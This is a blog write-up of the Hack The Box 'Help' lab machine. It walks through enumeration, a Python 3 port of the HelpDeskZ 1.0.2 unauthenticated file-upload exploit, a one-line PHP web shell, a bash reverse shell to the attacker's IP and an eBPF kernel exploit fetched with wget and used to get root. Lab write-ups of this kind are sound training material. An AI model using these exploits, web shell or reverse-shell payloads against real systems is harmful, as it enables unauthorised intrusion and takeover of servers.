Open in app

Sign in

Write

Sign in

Help

joseml
5 min readNov 10, 2023

--

Help is an Easy Linux box which has a GraphQL endpoint which can be enumerated get a set of credentials for a HelpDesk software. The software is vulnerable to blind SQL injection which can be exploited to get a password for SSH Login. Alternatively an unauthenticated arbitrary file upload can be exploited to get RCE. Then the kernel is found to be vulnerable and can be exploited to get a root shell.

ENUMERATION

Lets begin as always with an Nmap Scan:

target=127.0.0.1; nmap -T4 -p$(nmap -Pn -T4 $target | grep '^[0–9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -Pn -sVC $target
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e5bb4d9cdeaf6bbfba8c227ad8d74328 (RSA)
| 256 d5b010507486a39fc5536f3b4a246119 (ECDSA)
|_ 256 e21b88d37621d41e38154a8111b79907 (ED25519)
80/tcp open http Apache httpd 2.4.18
|_http-title: Did not follow redirect to http://help.htb/
|_http-server-header: Apache/2.4.18 (Ubuntu)
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

The port 80 redirects to a domain:

echo '10.10.10.121 help.htb' >> /etc/hosts

It shows an apache default installation page. Using ffuf i have found the “/support” endpoint

ffuf -u http://help.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -v -fc 404 -mc all -fs 11321
[Status: 301, Size: 306, Words: 20, Lines: 10, Duration: 21ms]
| URL | http://help.htb/support
| --> | http://help.htb/support/
    * FUZZ: support

On it we can find:

Help Desk Software by HelpDeskZ

searchsploit helpdeskz
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Exploit Title | Path
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
HelpDeskZ 1.0.2 - Arbitrary File Upload | php/webapps/40300.py
HelpDeskZ < 1.0.2 - (Authenticated) SQL Injection / Unauthorized File Download | php/webapps/41200.py
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Shellcodes: No Results

HelpDeskZ = v1.0.2 suffers from an unauthenticated shell upload vulnerability.

searchsploit -m php/webapps/40300.py
Exploit: HelpDeskZ 1.0.2 - Arbitrary File Upload
URL: https://www.exploit-db.com/exploits/40300
Path: /usr/share/exploitdb/exploits/php/webapps/40300.py
Codes: N/A
Verified: False
File Type: ASCII text
Copied to: /root/home/40300.py

This exploit does not work (That’s what i tought) because when i try to upload the “shell.php” file i get:

File is not allowed.

I saw that the exploit asume our file will be saved to:

http://the_url_we_will_enter/the_exploit_name

So we have to enter the full path to the URI where the ticket should be saved:

Fuzzing i have found this URL:

ffuf -u http://help.htb/support/uploads/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big_lowercase.txt -v -fc 404,403 -mc all
[Status: 301, Size: 322, Words: 20, Lines: 10, Duration: 29ms]
| URL | http://help.htb/support/uploads/tickets
| → | http://help.htb/support/uploads/tickets/
* FUZZ: tickets

I have also modified the exploit to use python 3

import hashlib
import time
import sys
import requests
import datetime

print('Helpdeskz v1.0.2 - Unauthenticated shell upload exploit')

if len(sys.argv) < 3:
    print("Usage {} [baseUrl] [nameOfUploadedFile]".format(sys.argv[0]))
    sys.exit(1)

helpdeskzBaseUrl = sys.argv[1]
fileName = sys.argv[2]

r = requests.get(helpdeskzBaseUrl)

# Gets the current time of the server to prevent timezone errors - DoctorEww
currentTime = int((datetime.datetime.strptime(r.headers['date'], '%a, %d %b %Y %H:%M:%S %Z') - datetime.datetime(1970, 1, 1)).total_seconds())

for x in range(0, 300):
    plaintext = fileName + str(currentTime - x)
    md5hash = hashlib.md5(plaintext.encode()).hexdigest()

    url = helpdeskzBaseUrl + md5hash + '.php'
    response = requests.head(url)
    if response.status_code == 200:
        print('found!')
        print(url)
        sys.exit(0)

EXPLOITATION

This is my shell.php file:

<pre>
<?php echo system($_GET["cmd"]); ?>
</pre>
<br>
********************* think *********************

Like that the exploit worked:

python 40300.py 'http://help.htb/support/uploads/tickets/' 'shell.php'
Helpdeskz v1.0.2 - Unauthenticated shell upload exploit
found!
http://help.htb/support/uploads/tickets/e7e5ce96e6c0ffbdb06a2a1dc659bd06.php

Going to the URL:

http://help.htb/support/uploads/tickets/e7e5ce96e6c0ffbdb06a2a1dc659bd06.php?cmd=id
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
********************* think *********************

This payload gave me a shell:

http://help.htb/support/uploads/tickets/e7e5ce96e6c0ffbdb06a2a1dc659bd06.php?cmd=bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.16.31%2F6666%200%3E%261%22

On my nc:

nc -nlvp 6666
Listening on 0.0.0.0 6666
Connection received on 10.10.10.121 50190
bash: cannot set terminal process group (907): Inappropriate ioctl for device
bash: no job control in this shell
help@help:/var/www/html/support/uploads/tickets$ whoami
whoami
help
help@help:/var/www/html/support/uploads/tickets$ hostname
hostname
help
help@help:/var/www/html/support/uploads/tickets$

ROOT

From Linpeas i got:

Linux version 4.4.0–116-generic (buildd@lgw01-amd64–021) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0–6ubuntu1~16.04.9) ) #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018
[+] [CVE-2017–16995] eBPF_verifier
Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Exposure: highly probable
Tags: debian=9.0{kernel:4.9.0–3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0–89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2016–5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0–0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016–5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32–21-generic},[ ubuntu=16.04 ]{kernel:4.4.0–21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
[1] af_packet
CVE-2016–8655
Source: http://www.exploit-db.com/exploits/40871
[2] exploit_x
CVE-2018–14665
Source: http://www.exploit-db.com/exploits/45697
[3] get_rekt
CVE-2017–16695
Source: http://www.exploit-db.com/exploits/45010

Looking at this exploit that popped out in both LE Suggester and Linpeas:

[+] [CVE-2017–16995] eBPF_verifier
Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Exposure: highly probable
Tags: debian=9.0{kernel:4.9.0–3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0–89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

I got the exploit and launched it:

help@help:/tmp$ wget 10.10.16.31/45010.c
 - 2023–07–18 13:09:34 -  http://10.10.16.31/45010.c
Connecting to 10.10.16.31:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 13728 (13K) [text/x-csrc]
Saving to: '45010.c'
45010.c 100%[===================>] 13.41K - .-KB/s in 0.05s
2023–07–18 13:09:34 (294 KB/s) - '45010.c' saved [13728/13728]
help@help:/tmp$ gcc 45010.c -o expl -pthread -lcrypt
help@help:/tmp$ ./expl
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff8800368ea000
[*] Leaking sock struct from ffff880038746000
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88000b61d080
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff88000b61d080
[*] credentials patched, launching shell…
\[\e[32m\]\u@\h\[\e[0m\]:\[\e[34m\]\w\[\e[0m\]$ whoami
root
\[\e[32m\]\u@\h\[\e[0m\]:\[\e[34m\]\w\[\e[0m\]$ bash
root@help:/tmp# hostname
help
root@help:/tmp#

Owned Help from Hack The Box!

I have just owned machine Help from Hack The Box

www.hackthebox.com

Congratulations! We have successfully completed this machine. Thank you for reading!

Help
Hackthebox
Help Writeup
Help Walktrough
Htb

--

--

joseml
joseml

Written by joseml

41 Followers
0 Following

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams